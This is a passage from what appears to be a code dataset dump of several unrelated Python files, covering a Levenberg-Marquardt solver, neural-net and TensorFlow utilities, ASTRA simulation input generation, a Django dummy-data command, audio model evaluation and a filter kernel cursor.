Computes the Jacobian of the weighted error ``e_W(f) = W(f,:,:)*e(f)``\n\n \"\"\"\n # np.einsum('ijk,kl',weight, mat) or\n # np.einsum('ijk,kl->ijl',weight, mat) or\n # np.einsum('ijk,jl->ilk',weight,mat)\n # np.tensordot(weight, mat, axes=1)\n # np.matmul(weight, mat)\n return np.matmul(weight, mat)\n\n\ndef normalize_columns(mat):\n\n # Rms values of each column\n scaling = np.sqrt(np.mean(mat**2, axis=0))\n # or scaling = 1/np.sqrt(mat.shape[0]) * np.linalg.norm(mat,ord=2,axis=0)\n # Robustify against columns with zero rms value\n scaling[scaling == 0] = 1\n # Scale columns with 1/rms value\n # This modifies mat in place(ie the input mat). We do not want that.\n # mat /= scaling\n return mat/scaling, scaling\n\n\ndef lm(fun, x0, jac, info=2, nmax=50, lamb=None, ftol=1e-8, xtol=1e-8,\n gtol=1e-8, cost_normalize=None, args=(), kwargs={}):\n \"\"\"Solve a nonlinear least-squares problem using levenberg marquardt\n algorithm. See also :scipy-optimize:func:`scipy.optimize.least_squares`\n\n Parameters\n ----------\n fun : callable\n Function which computes the vector of residuals\n x0: array_like with shape (n,) or float\n Initial guess on independent variables.\n jac : callable\n Method of computing the Jacobian matrix (an m-by-n matrix, where\n element (i, j) is the partial derivative of f[i] with respect to\n x[j]).\n ftol : float, optional\n Tolerance for termination by the change of the cost function. Default\n is 1e-8. The optimization process is stopped when ``dF < ftol * F``,\n and there was an adequate agreement between a local quadratic model and\n the true model in the last step.\n xtol : float, optional\n Tolerance for termination by the change of the independent variables.\n Default is 1e-8.\n gtol : float, optional\n Tolerance for termination by the norm of the gradient. Default is 1e-8.\n info : {0, 1, 2}, optional\n Level of algorithm's verbosity:\n * 0 (default) : work silently.\n * 1 : display a termination report.\n * 2 : display progress during iterations\n\n \"\"\"\n # the error vector\n err_old = fun(x0, *args, **kwargs)\n # Maybe divide by 2 to match scipy's implementation of minpack\n cost = np.dot(err_old, err_old)\n cost_old = cost.copy()\n\n # Initialization of the Levenberg-Marquardt loop\n niter = 0\n ninner_max = 10\n nfev = 1\n status = None\n message = ''\n cost_vec = np.empty(nmax+1)\n x0_mat = np.empty((nmax+1, len(x0)))\n # save initial guess\n x0_mat[0] = x0.copy()\n cost_vec[0] = cost.copy()\n\n # Allow for different kinds of cost_normalization\n if cost_normalize is None:\n def _cost_normalize(x): return x\n elif np.isscalar(cost_normalize):\n def _cost_normalize(x): return x/cost_normalize\n else: # if callable(obj)\n _cost_normalize = cost_normalize\n\n if info == 2:\n print(f\"{'i':3} | {'inner':5} | {'cost':12} | {'cond':12} |\"\n f\" {'lambda':6}\")\n\n stop = False\n while niter < nmax and not stop:\n\n J = jac(x0, *args, **kwargs)\n J, scaling = normalize_columns(J)\n U, s, Vt = svd(J, full_matrices=False)\n\n if norm(J) < gtol: # small jacobian\n stop = True\n status = 1\n\n if lamb is None:\n # Initialize lambda as largest sing. value of initial jacobian.\n # pinleton2002\n lamb = s[0]\n\n # as long as the step is unsuccessful\n ninner = 0\n # determine rank of jacobian/estimate non-zero singular values(rank\n # estimate)\n tol = max(J.shape)*np.spacing(max(s))\n r = np.sum(s > tol)\n\n # step with direction from err\n s = s[:r]\n sr = s.copy() # only saved to calculate cond. 
number later\n while cost >= cost_old and ninner < ninner_max and not stop:\n s /= (s**2 + lamb**2)\n ds = -np.linalg.multi_dot((err_old, U[:, :r] * s, Vt[:r]))\n ds /= scaling\n\n x0test = x0 + ds\n err = fun(x0test, *args, **kwargs)\n cost = np.dot(err, err)\n if cost >= cost_old:\n # step unsuccessful, increase lambda, ie. Lean more towards\n # gradient descent method(converges in larger range)\n lamb *= np.sqrt(10)\n s = sr.copy()\n elif np.isnan(cost):\n print('Unstable model. Increasing lambda')\n cost = np.inf\n lamb *= np.sqrt(10)\n s = sr.copy()\n else:\n # Lean more towards Gauss-Newton algorithm(converges faster)\n lamb /= 2\n ninner += 1\n\n if norm(ds) < xtol: # small step\n stop = True\n status = 3\n if np.abs((cost-cost_old)/cost) < ftol: # small change in costfcn\n stop = True\n status = 2 if status is None else 4\n\n if info == 2:\n jac_cond = sr[0]/sr[-1]\n # {cost/2/nfd/R/p:12.3f} for freq weighting\n print(f\"{niter:3d} | {ninner:5d} | {_cost_normalize(cost):12.8g}\"\n f\" | {jac_cond:12.3f} | {lamb:6.3f}\")\n\n if cost < cost_old or stop:\n cost_old = cost\n err_old = err\n x0 = x0test\n # save intermediate models\n x0_mat[niter+1] = x0.copy()\n cost_vec[niter+1] = cost.copy()\n\n niter += 1\n nfev += ninner\n\n if niter == nmax:\n status = 0\n message = TERMINATION_MESSAGES[status]\n if info > 0:\n print(f\"Terminated: {message:s}\")\n print(f\"Function evaluations {nfev}, \"\n f\"initial cost {_cost_normalize(cost_vec[0]):.4e}, \"\n f\"final cost {_cost_normalize(cost):.4e}\")\n\n res = {'x': x0, 'cost': cost, 'fun': err, 'niter': niter, 'x_mat':\n x0_mat[:niter], 'cost_vec': cost_vec[niter], 'message': message,\n 'success': status > 0, 'nfev': nfev, 'njev': niter, 'status': status}\n return res\n","sub_path":"pyvib/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350007311","text":"from AC_DeepNet.linear_backward import linear_backward\nfrom AC_DeepNet.relu_backward import relu_backward\nfrom AC_DeepNet.sigmoid_backward import sigmoid_backward\n\n\ndef linear_activation_backward(dA, cache, activation):\n \"\"\"\n Implement the backward propagation for the LINEAR->ACTIVATION layer\n :param dA: post-activation gradient for current layer l\n :param cache: tuple of values (linear_cache, activation_cache) we stored\n :param activation: the activation to be used in this layer: \"sigmoid\" or \"relu\"\n :return: gradient of the cost wrt the activation (of the previous layer l-1), same shape as A_prev -- dA_prev\n gradient of the cost wrt W (current layer l), same shape as W -- dW\n gradient of the cost wrt b (current layer l), same shape as b -- db\n \"\"\"\n\n linear_cache, activation_cache = cache\n\n if activation == \"relu\":\n dZ = relu_backward(dA, activation_cache)\n dA_prev, dW, db = linear_backward(dZ, linear_cache)\n\n elif activation == \"sigmoid\":\n dZ = sigmoid_backward(dA, activation_cache)\n dA_prev, dW, db = linear_backward(dZ, linear_cache)\n\n return dA_prev, dW, db","sub_path":"AC_DeepNet/linear_activation_backward.py","file_name":"linear_activation_backward.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481886128","text":"\"\"\"Manage saving and loading of model checkpoints.\"\"\"\nimport os\nimport re\n\nimport tensorflow as tf\n\n\nclass CheckpointManager(object):\n \"\"\"Manager to coordinate saving and loading of 
trainable parameters.\"\"\"\n\n def __init__(self, model):\n \"\"\"Initialize manager based on given model instance.\"\"\"\n self._tensorflow_session = model._tensorflow_session\n self._model = model\n\n def build_savers(self):\n \"\"\"Create tf.train.Saver instances.\"\"\"\n all_saveable_vars = sorted(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES) +\n tf.get_collection(tf.GraphKeys.SAVEABLE_OBJECTS) +\n tf.get_collection(tf.GraphKeys.MOVING_AVERAGE_VARIABLES) +\n tf.get_collection_ref('batch_norm_non_trainable'),\n key=lambda v: v.name)\n all_prefixes = []\n for schedule in self._model._learning_schedule:\n for prefixes in schedule['loss_terms_to_optimize'].values():\n all_prefixes += prefixes\n all_prefixes = list(set(all_prefixes))\n\n # For each prefix, create saver\n self._savers = {}\n for prefix in all_prefixes:\n vars_to_save = [v for v in all_saveable_vars if v.name.startswith(prefix + '/')]\n if len(vars_to_save):\n self._savers[prefix] = tf.train.Saver(vars_to_save, max_to_keep=2)\n\n def load_all(self):\n \"\"\"Load all available weights for each known prefix.\"\"\"\n iteration_number = 0\n for prefix, saver in self._savers.items():\n output_path = '%s/checkpoints/%s' % (self._model.output_path, prefix)\n checkpoint = tf.train.get_checkpoint_state(output_path)\n if checkpoint and checkpoint.model_checkpoint_path:\n checkpoint_name = os.path.basename(checkpoint.model_checkpoint_path)\n try: # Attempt to restore saveable variables\n self._savers[prefix].restore(self._tensorflow_session,\n '%s/%s' % (output_path, checkpoint_name))\n iteration_number = \\\n int(next(re.finditer(\"(\\d+)(?!.*\\d)\", checkpoint_name)).group(0))\n except Exception as e:\n import traceback\n traceback.print_exc()\n return iteration_number\n\n def save_all(self, iteration_number):\n \"\"\"Save all prefixes.\"\"\"\n for prefix, saver in self._savers.items():\n output_path = '%s/checkpoints/%s' % (self._model.output_path, prefix)\n if not os.path.isdir(output_path):\n os.makedirs(output_path)\n saver.save(self._tensorflow_session, output_path + '/model',\n global_step=iteration_number)\n","sub_path":"src/core/checkpoint_manager.py","file_name":"checkpoint_manager.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284291395","text":"def generator_file(astra_path, IPart='1000', Ref_Ekin='0.00', sig_Ekin='100.0', laser_pulse='190.0e-6', spot_size='100'):\n generator_input_file=open(astra_path + 'common_files/distrib_sspot'+spot_size+'.in','w')\n generator_input_file.write(\n\"\"\"&INPUT\nFNAME='distrib_sspot\"\"\"+spot_size+\"\"\".ini'\nAdd=FALSE,\tN_add=0\nIPart=\"\"\" + IPart + \n\"\"\"\nSpecies='electrons'\nProbe=True,\tNoise_reduc=F,\tCathode=T\nQ_total=\"\"\" + str(1.60217662*1e-10*int(IPart)) + \n\"\"\"\nRef_zpos=0.0\nRef_Ekin=\"\"\" + Ref_Ekin + \"\"\"\t\nsig_Ekin=\"\"\" + sig_Ekin + \"\"\"\nC_sig_Ekin=0.0\nDist_z='g'\nsig_clock=\"\"\" + laser_pulse + \"\"\"\nC_sig_clock=0.0\nDist_pz='isotropic',\tphi_eff=4.65,\tE_photon=4.7 \n\nDist_x='g'\nsig_x=\"\"\" + str(int(spot_size)*0.001) + \"\"\"\nc_sig_x=0.0,\tDist_px = 'g', sig_px = 0.0, Nemit_x=0.0\nDist_y='g'\nsig_y=\"\"\" + str(int(spot_size)*0.001) + \"\"\"\nc_sig_y=0.0,\tDist_py = 'g', sig_py = 0.0, Nemit_y=0.0 \n/\n\"\"\")\n generator_input_file.close()\n\ndef astra_file(tracking_path, B_field_filename, E_field_filename, max_Ez, IPart='1000', Ap_R='0.1', Ap_z1='0.0105', Ap_z2='0.0108', spot_size='100'):\n astra_input_file=open(tracking_path + 
B_field_filename + '/' + B_field_filename + '_sspot'+spot_size+'.in','w')\n #making astra input files\n astra_input_file.write(\n\"\"\"&NEWRUN\nHead='astra template'\nRUN=1\nLoop=F, Nloop=2\nDistribution = 'distrib_sspot\"\"\" +spot_size+\"\"\".ini'\nXoff=0.0, Yoff=0.0\nLmagnetized=T\nEmitS=T\nPhaseS=T\nTrackS=T\nLandFS=T\nRefS=T\nTcheckS=T\nCathodeS=T\nTRACK_ALL=T\nPHASE_SCAN=F\nAUTO_PHASE=T\ncheck_ref_part=F,\nZSTART=0.0, ZSTOP=0.03\nZemit=500\nZphase=10\nH_max=8.0E-5\nH_min=0.0\n/\n\n&SCAN\nLScan=F\nScan_para='Zrms',S_min=0.0 ,S_max=5.0E-4 ,S_numb=9\nFOM(1)='bunch length'\n/\n\n&CHARGE\nLoop=F\nLSPCH=T\nNrad=10, Nlong_in=10\nCell_var=2.0\nmin_grid=1.0E-7\nMax_scale=0.05\nMax_count=10\nLmirror=T\n/\n\n&Aperture\nLApert=F\nFile_Aperture(1)='RAD'\nAp_R(1)=\"\"\"+Ap_R+\"\"\"\nAp_Z1(1)=\"\"\"+Ap_z1+\"\"\"\nAp_Z2(1)=\"\"\"+Ap_z2+\"\"\"\n/\n\n&CAVITY\nLoop=F\nLEFieLD=T\nC_noscale(1)=F\nFILE_EFieLD(1)='\"\"\" + E_field_filename + \"\"\".dat'\nC_smooth(1)=0.0\nNue(1)=0.0\nMaxE(1)=\"\"\"+str(max_Ez)+\n\"\"\"\nPhi(1)=0.0,\nC_pos(1)=0.0\n/\n\n&SOLENOID\nLoop=F\nLBFieLD=T\nFILE_BFieLD(1)='\"\"\" + B_field_filename + \"\"\".dat'\nS_smooth(1)=0.0\nS_noscale(1)=T\nS_higher_order=F\nS_pos(1)=0.0\nS_xoff(1)=0.0\nS_yoff(1)=0.0\n/\n\"\"\")\n astra_input_file.close()\n\n","sub_path":"source_code/astra_inputs.py","file_name":"astra_inputs.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"211548053","text":"from django.core.management.base import BaseCommand\nfrom Users.models import User, ActivityPeriod\nfrom numpy.random import randint\nimport pandas as pd\nfrom baseconvert import base\nfrom datetime import timedelta\nfrom randomtimestamp import randomtimestamp\nfrom functools import reduce\nfrom pytz import timezone as get_timezone\nfrom tqdm import tqdm, trange\nimport string\n\n## just a function, which is not directly related to our case\ndef get_conversion_dict():\n '''\n creates a dictionary mapping numbers to letters and digits\n all the digits and alphabets will be mapped to a numbers between 0 and 61\n it will be for converting integer ids to a string id\n will return a dictionary that looks like the following:\n {0 : '0', 1 : '1', ..., 9:'9', 10: 'a', 11: 'b', ..., 60: 'Y', 61: 'Z'}\n '''\n digits = string.digits\n conversion_dict = { i:digits[i] for i in range(len(digits))}\n letters = string.ascii_letters\n conversion_dict = { **conversion_dict, **dict(zip(range(len(digits), len(digits) + len(letters)), letters))}\n return conversion_dict\n\nconversion_dict = get_conversion_dict()\n\n\ndef integer_id_to_string_id(integer_id):\n '''\n converts an integer to a base 62 number and maps the individual digits to a alphanumeric character with the\n help of the conversion dict created above\n\n this function and the get_conversion dict function are just for making string ids out of integer ids and might not\n be crucial to our case unless string ids are compulsory\n '''\n return \"\".join([conversion_dict[digit] for digit in base(integer_id, 10, 62)])\n\n\nclass Command(BaseCommand):\n '''\n Class for creating a command which can be used from the terminal to populate database with generated data\n '''\n help = 'Populate database with sample data'\n\n def add_arguments(self, parser):\n '''\n adds arguments to the command to determine variables for populating data\n '''\n\n # number of user records to be inserted into the database\n parser.add_argument('--no-user-records', type=int)\n\n # number of activity 
period entries to be inserted into the database per user, within the range entered\n parser.add_argument('--no-periods-per-user', nargs=2, type=int)\n\n # argument for localizing datetimes according to user timezones (making them timezone 'aware' instead of 'naive')\n parser.add_argument('--localize-datetime', default=False)\n\n def handle(self, *args, **options):\n '''\n this method populates the database with randomly generated values with the help of other functions in this module\n '''\n\n ## receiving command line arguments\n no_of_users_records = options[\"no_user_records\"]\n min_periods_per_user, max_periods_per_user = options['no_periods_per_user']\n use_user_timezone = options['localize_datetime'].lower() == 'true'\n assert min_periods_per_user<=max_periods_per_user\n\n ## reading sample data for names and timezones in order to generate new samples from them\n with open('Users/datapopulation/first_names_all.txt', 'r') as file:\n first_names = file.read().split(\"\\n\")\n with open('Users/datapopulation/last_names_all.txt', 'r') as file:\n last_names = file.read().split(\"\\n\")\n timezones = list(pd.read_csv(\"Users/datapopulation/zone.csv\", header=None)[2])\n\n ## calling the other functions defined and populating the database\n self.populate_database(no_of_users_records, min_periods_per_user, max_periods_per_user, first_names, last_names, timezones, use_user_timezone=use_user_timezone)\n\n\n\n # generate a single User instance with randomly selected values\n def generate_single_user_instance(self, serial_no, first_names, last_names, timezones, no_of_first_names, no_of_last_names, no_of_timezones):\n '''\n description : generates a User object by combining first and last names into a realname field, choosing a random timezone\n and using the id passed.\n\n\n params\n ------\n serial_no : int\n the id of the user generated as a serial (increment by one) which is to be converted to a string_id using\n the integer_id_to_string_id method\n first_names : list\n a list containing common first names of people\n last_names : list\n a list containing common last names of people\n timezones : list\n a list containing names of different timezones around the world\n no_of_first_names : int\n number of first names in the first_names list, equals len(first_names)\n no_of_last_names : int\n number of last names in the last_names list, equals len(last_names)\n no_of_timezones : int\n number of timezones in the timezones list, equals len(timezones)\n\n returns\n -------\n A models.User object\n '''\n realname = \" \".join([first_names[randint(0, no_of_first_names)], last_names[randint(0,no_of_last_names)]])\n realname = realname.title()\n timezone = timezones[randint(0,no_of_timezones)]\n return User(id=integer_id_to_string_id(serial_no), realname = realname, tz = timezone )\n\n # create User instances for populating database\n def create_user_instances(self, no_of_instances, first_names, last_names, timezones, id_offset=int(1e20)):\n '''\n description : generates the number of User instances specified in the no_of_instances variable\n\n params\n ------\n no_of_instances : int\n the number of objects to be created and returned\n first_names : list\n a list containing common first names of people\n last_names : list\n a list containing common last names of people\n timezones : list\n a list containing names of different timezones around the world\n id_offset : int\n a large number, the minimum integer id is this number and is incremented by 1 for each new object to be generated\n has no real
purpose other than making the length of the string id large\n\n returns\n -------\n A list of models.User objects\n '''\n no_of_first_names = len(first_names)\n no_of_last_names = len(last_names)\n no_of_timezones = len(timezones)\n print(f\"Creating dummy data for {no_of_instances} users...\")\n instances = [ self.generate_single_user_instance(serial_no, first_names, last_names, timezones, no_of_first_names, no_of_last_names, no_of_timezones) for serial_no in trange(id_offset, id_offset+no_of_instances)]\n return instances\n\n # method for creating a single ActivityPeriod instance\n def create_activity_period_single_instance(self, user, min_minutes_per_session, max_minutes_per_session, starting_year, user_timezone = None):\n '''\n description : creates a single instance of models.ActivityPeriod for the particular user\n\n params\n -------\n user : models.User\n the user id for which the ActivityPeriod has to be created is retrieved from this User object\n min_minutes_per_session : int\n the minimum number of minutes that an ActivityPeriod will have i.e. endtime - starttime >= min_minutes_per_session\n max_minutes_per_session : int\n the maximum number of minutes that an ActivityPeriod will have i.e. endtime - starttime <= max_minutes_per_session\n starting_year : int\n year after which datetimes will be generated e.g. if starting year is 2010, all dates generated will\n be after 2010\n user_timezone : str\n the timezone of the user. if None the datetimes generated will be naive\n\n returns\n -------\n An instance of models.ActivityPeriod\n\n '''\n\n # generate a random timestamp after starting year which will be our starttime and add a value within the range\n # (min_minutes_per_session, max_minutes_per_session) to obtain a random endtime\n start_datetime = randomtimestamp(starting_year, False)\n end_datetime = start_datetime + timedelta(minutes=randint(min_minutes_per_session, max_minutes_per_session))\n\n # if user_timezone is passed convert the datetime to a timezone localized datetime\n if user_timezone:\n user_timezone = get_timezone(user_timezone)\n start_datetime = user_timezone.localize(start_datetime)\n end_datetime = user_timezone.localize(end_datetime)\n\n return ActivityPeriod(userid=user, starttime=start_datetime, endtime=end_datetime)\n\n # method for creating multiple ActivityPeriod instances for a single user\n def create_activity_period_instances_for_single_user(self, user,\n no_of_periods, min_minutes_per_session = 0.2, max_minutes_per_session=1000,\n starting_year= 2010, user_timezone = None):\n '''\n description : for a single user, generates multiple activity periods specified by the no_of_periods\n\n params\n ------\n user : models.User\n the user id for which the ActivityPeriod has to be created is retrieved from this User object\n no_of_periods : int\n the number of instances to be generated for the given user\n min_minutes_per_session : int\n the minimum number of minutes that an ActivityPeriod will have i.e. endtime - starttime >= min_minutes_per_session\n max_minutes_per_session : int\n the maximum number of minutes that an ActivityPeriod will have i.e. endtime - starttime <= max_minutes_per_session\n starting_year : int\n year after which datetimes will be generated e.g. if starting year is 2010, all dates generated will\n be after 2010\n user_timezone : str\n the timezone of the user.
if None the datetimes generated will be naive\n\n returns\n -------\n A list of models.ActivityPeriod objects with the same userid\n '''\n return [ self.create_activity_period_single_instance(user, min_minutes_per_session, max_minutes_per_session, starting_year, user_timezone) for i in range(no_of_periods)]\n\n # method for generating activity periods of users from a list of user ids\n def create_activity_periods_for_all_users(self, users, min_periods = 1, max_periods = 16, use_user_timezone = True):\n '''\n description : creates several activity periods individually for all the users given\n\n params\n ------\n users : list\n a list of models.User instances, whose ids are to be used for creating ActivityPeriod instances\n min_periods : int\n the minimum number of activity periods to be generated per user\n max_periods : int\n the maximum number of activity periods to be generated per user\n use_user_timezone : boolean\n if true, gets the timezone from the User objects and localizes the datetimes (starttime and endtime) in the\n ActivityPeriod instances to be generated\n\n returns\n -------\n a list of models.ActivityPeriod instances\n '''\n print(f\"Creating dummy data for activity periods for {len(users)} users...\")\n\n # get an individual list of ActivityPeriod instances for each user and store them in a single list\n if use_user_timezone:\n results = [ self.create_activity_period_instances_for_single_user(user, randint(min_periods, max_periods), user_timezone=user.tz) for user in tqdm(users)]\n else:\n results = [ self.create_activity_period_instances_for_single_user(user, randint(min_periods, max_periods), user_timezone=None) for user in tqdm(users)]\n print(\"Reducing results to single list...\")\n # reduce the nested list structure into a single list of ActivityPeriod instances\n results = reduce(lambda x,y : [*x,*y], tqdm(results))\n return results\n\n # method for populating both the users and activity period database using the methods described above\n def populate_database(self, no_of_users_records, min_periods_per_user, max_periods_per_user, first_names, last_names, timezones, use_user_timezone=False):\n '''\n description : generates a list of users and a list of activity periods for the users, and stores them in the database\n\n params\n ------\n no_of_user_records : int\n the number of User instances to be generated\n min_periods_per_user : int\n the minimum number of activity periods to be generated per user\n max_periods_per_user : int\n the maximum number of activity periods to be generated per user\n first_names : list\n a list containing common first names of people\n last_names : list\n a list containing common last names of people\n timezones : list\n a list containing names of different timezones around the world\n use_user_timezone : boolean\n whether to localize datetime entities with the user's timezone\n '''\n users_data = self.create_user_instances(no_of_users_records, first_names, last_names, timezones)\n activity_periods_data = self.create_activity_periods_for_all_users([ user for user in users_data], use_user_timezone=use_user_timezone)\n print(\"Dummy data created.\")\n\n print(\"Populating users data...\")\n User.objects.bulk_create(users_data)\n print(\"Users data populated successfully.\")\n\n print(\"Populating activity periods data...\")\n ActivityPeriod.objects.bulk_create(activity_periods_data)\n print(\"Activity periods data populated
successfully.\")\n","sub_path":"Users/management/commands/populate_user_data.py","file_name":"populate_user_data.py","file_ext":"py","file_size_in_byte":14319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"616750534","text":"#!/usr/bin/env python3\n\nimport torch.utils.data as data\nimport os\nimport soundfile\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport torch.optim as optim\nimport copy\nimport torch.nn.functional as Func\nimport time\nfrom scipy.signal import stft, istft\n\n# Carbonate directory\nWAV_DIR = '/N/u/bsobolik/Carbonate/finalproject/TIMIT_full_fft2/test/'\nWAV_DIR = '/N/u/bsobolik/Carbonate/finalproject/test_file/'\n\n\n# WAV_DIR = '/Users/bsobolik/Desktop/TIMIT_full_copy/'\n\n# gcp directory\n# WAV_DIR = '/home/bsobolik_gmail_com/TIMIT_full_copy/test/'\n\nnps = 64\noverlap = .5\nnfft = 128\nsr = 16000\nfile_length_in_seconds = 3\nduration = sr * file_length_in_seconds\nflat_file_suffix = '_flat_fft'\nstep = int(nps * overlap)\n\nclass Net(nn.Module):\n def __init__(self, in_size, out_size):\n super(Net, self).__init__()\n\n self.fc1 = nn.Linear(in_size, 1024)\n self.fc2 = nn.Linear(1024, 1024)\n self.fc3 = nn.Linear(1024, 1024)\n self.fc4 = nn.Linear(1024, out_size)\n\n def forward(self, audio):\n audio = Func.relu(self.fc1(audio))\n audio = Func.relu(self.fc2(audio))\n audio = Func.relu(self.fc3(audio))\n audio = self.fc4(audio)\n return audio\n\ndef pad_or_truncate_data(mydata, length):\n data_length = len(mydata)\n if data_length > length:\n return mydata[:length]\n return np.concatenate((mydata, np.zeros(length - data_length)))\n\ndef get_files(path_to_files, suffix):\n result = []\n for dirname, dirnames, filenames in os.walk(path_to_files):\n for filename in filenames:\n if filename.endswith(suffix):\n result.append(os.path.join(dirname, filename))\n return result\n\ndef reshape_fft(nps, mydata):\n x = nps + 1\n y = int(len(mydata) / (x * 2))\n output = np.array([np.complex(x, y) for x, y in mydata.reshape([int(len(mydata)/2), 2])])\n return output.reshape((x, y), order='F')\n\ntest_files = get_files(WAV_DIR, '.wav')\nm1 = Net(nps, nfft + 2)\nm1.load_state_dict(torch.load('./models/dnn_model_carbonate_v2.pth'))\nprint(m1)\nm1 = m1.double()\n\nfor j, filepath in enumerate(test_files):\n print('{} of {}: {}'.format(j, len(test_files), filepath))\n\n fft_result = np.array([],dtype = np.float64)\n X, _ = soundfile.read(filepath)\n X = pad_or_truncate_data(X, sr * file_length_in_seconds)\n for i in range(0, duration, step):\n wav_start = i\n wav_end = i + nps\n if wav_end <= duration:\n m1.eval()\n input = torch.from_numpy(X[wav_start:wav_end])\n output = m1(input)\n temp = output.cpu().data.numpy()\n fft_result = np.concatenate((fft_result, temp))\n print(fft_result[:10])\n print('writing fft: length={}'.format(len(fft_result)))\n np.savetxt('{}{}'.format(filepath, '_carbonate_fft_out'), fft_result)\n fft_result = reshape_fft(nps, fft_result)\n tt, x = istft(fft_result,\n fs=sr,\n window='hamming',\n nperseg=nps,\n noverlap=int(nps * overlap),\n nfft = nfft)\n outname = filepath.split('.')[0] + '_carbonate_out.wav'\n print('writing soundfile')\n soundfile.write(outname, x, sr)\n","sub_path":"evaluate_results_carbonate.py","file_name":"evaluate_results_carbonate.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"240108784","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api, fields, _\nfrom 
odoo.exceptions import UserError\n\n\nclass PurchaseRequestCreate(models.TransientModel):\n _name = \"purchase.request.create\"\n _description = \"Create PR from selected RPB Line\"\n\n @api.multi\n def purchase_request_create(self):\n context = dict(self._context or {})\n active_ids = context.get('active_ids', []) or []\n\n # Create Purchase Request\n request_id = self.env['pwk.purchase.request'].create({\n 'pr_type': 'Bahan Baku',\n 'formula_type': 'PCS',\n 'date': fields.Date.today()\n })\n\n # Create Purchase Request Line\n for record in self.env['pwk.rpb.line'].browse(active_ids):\n lem_ids = self.env['pwk.rpb.lem'].search([\n ('rpb_line_id', '=', record.id)\n ])\n\n if lem_ids:\n for lem in lem_ids:\n self.env['pwk.purchase.request.line'].create({\n 'reference': request_id.id,\n 'product_id': lem.product_id.id,\n 'account_id': lem.product_id.categ_id.property_account_expense_categ_id.id,\n 'sheet': lem.qty,\n 'quantity': lem.qty,\n 'product_uom_id': lem.product_id.uom_id.id,\n })\n\n form_view_id = self.env.ref(\"v12_pwk.pwk_purchase_request_form\").id\n return {\n 'type': 'ir.actions.act_window',\n 'name': 'Purchase Request',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'pwk.purchase.request',\n 'res_id': request_id.id,\n 'views': [(form_view_id, 'form')],\n 'target': 'current',\n }\n","sub_path":"v12_pwk/wizard/create_purchase_request_lem.py","file_name":"create_purchase_request_lem.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245842770","text":"from .movie import Movie\nimport numpy as np\nfrom .linearfilter import SpatioTemporalFilter\nfrom .spatialfilter import GaussianSpatialFilter\nfrom .temporalfilter import TemporalFilterCosineBump\nfrom .utilities import convert_tmin_tmax_framerate_to_trange\nimport matplotlib.pyplot as plt\nfrom .kernel import Kernel3D\nimport scipy.signal as spsig\nimport time\n\nclass KernelCursor(object):\n\n \n def __init__(self, kernel, movie):\n \n self.movie = movie\n self.kernel = kernel\n self.cache = {}\n\n # print self.kernel.t_range.min(), self.kernel.t_range.max(), type(kernel), len(self.kernel)\n \n # This ensures that the kernel frame rate matches the movie frame rate:\n np.testing.assert_almost_equal(np.diff(self.kernel.t_range), np.ones_like(self.kernel.t_range[1:])*(1./movie.frame_rate))\n \n @property\n def row_range(self):\n return self.movie.row_range\n \n @property\n def col_range(self):\n return self.movie.col_range\n \n @property\n def t_range(self):\n return self.movie.t_range\n \n @property\n def frame_rate(self):\n return self.movie.frame_rate\n \n def evaluate(self, t_min=None, t_max=None, downsample=1):#:#, show=True, ax=None, plot=False, save_file_name=None, plotstyle='b-'):\n\n\n # print 'EVALUATE'\n if t_max is None:\n t_max = self.t_range[-1]\n \n if t_min is None:\n t_min = self.t_range[0]\n \n t_range = convert_tmin_tmax_framerate_to_trange(t_min, t_max, self.movie.frame_rate)[::int(downsample)]\n y_vals = np.array([self(t) for t in t_range])\n\n return t_range, y_vals \n \n def __call__(self, t):\n \n\n \n if t < self.t_range[0] or t > self.t_range[-1]:\n curr_rate = 0\n else:\n# print 'zero'\n \n ti = t*self.frame_rate\n til, tir = int(np.floor(ti)), int(np.ceil(ti))\n \n tl, tr = float(til)/self.frame_rate, float(tir)/self.frame_rate\n if np.abs(tl-t)<1e-12:\n curr_rate = self.apply_dot_product(til)\n # print 'a'\n \n elif np.abs(tr-t)<1e-12:\n curr_rate = self.apply_dot_product(tir)\n # print 'b'\n 
else:\n wa, wb = (1-(t-tl)/(tr-tl)), (1-(tr-t)/(tr-tl))\n cl = self.apply_dot_product(til)\n cr = self.apply_dot_product(tir) \n curr_rate = cl*wa+cr*wb\n # print 'c'\n \n if np.isnan(curr_rate):\n raise RuntimeError('computed rate is NaN')\n \n return curr_rate\n\n def apply_dot_product(self, ti_offset):\n \n try:\n return self.cache[ti_offset]\n \n except KeyError:\n t_inds = self.kernel.t_inds + ti_offset + 1 # Offset by one nhc 14 Apr '17\n min_ind, max_ind = 0, self.movie.data.shape[0]\n allowed_inds = np.where(np.logical_and(min_ind <= t_inds, t_inds < max_ind))\n t_inds = t_inds[allowed_inds]\n row_inds = self.kernel.row_inds[allowed_inds]\n col_inds = self.kernel.col_inds[allowed_inds]\n kernel_vector = self.kernel.kernel[allowed_inds] \n result = np.dot(self.movie[t_inds, row_inds, col_inds],kernel_vector)\n self.cache[ti_offset] = result\n return result\n \nclass FilterCursor(KernelCursor):\n\n def __init__(self, spatiotemporal_filter, movie, threshold=0):\n \n self.spatiotemporal_filter = spatiotemporal_filter\n kernel = self.spatiotemporal_filter.get_spatiotemporal_kernel(movie.row_range, movie.col_range, t_range=movie.t_range, threshold=threshold, reverse=True)\n\n super(FilterCursor, self).__init__(kernel, movie)\n \nclass LNUnitCursor(KernelCursor):\n \n def __init__(self, lnunit, movie, threshold=0):\n\n # print 'LNUnitCursor'\n 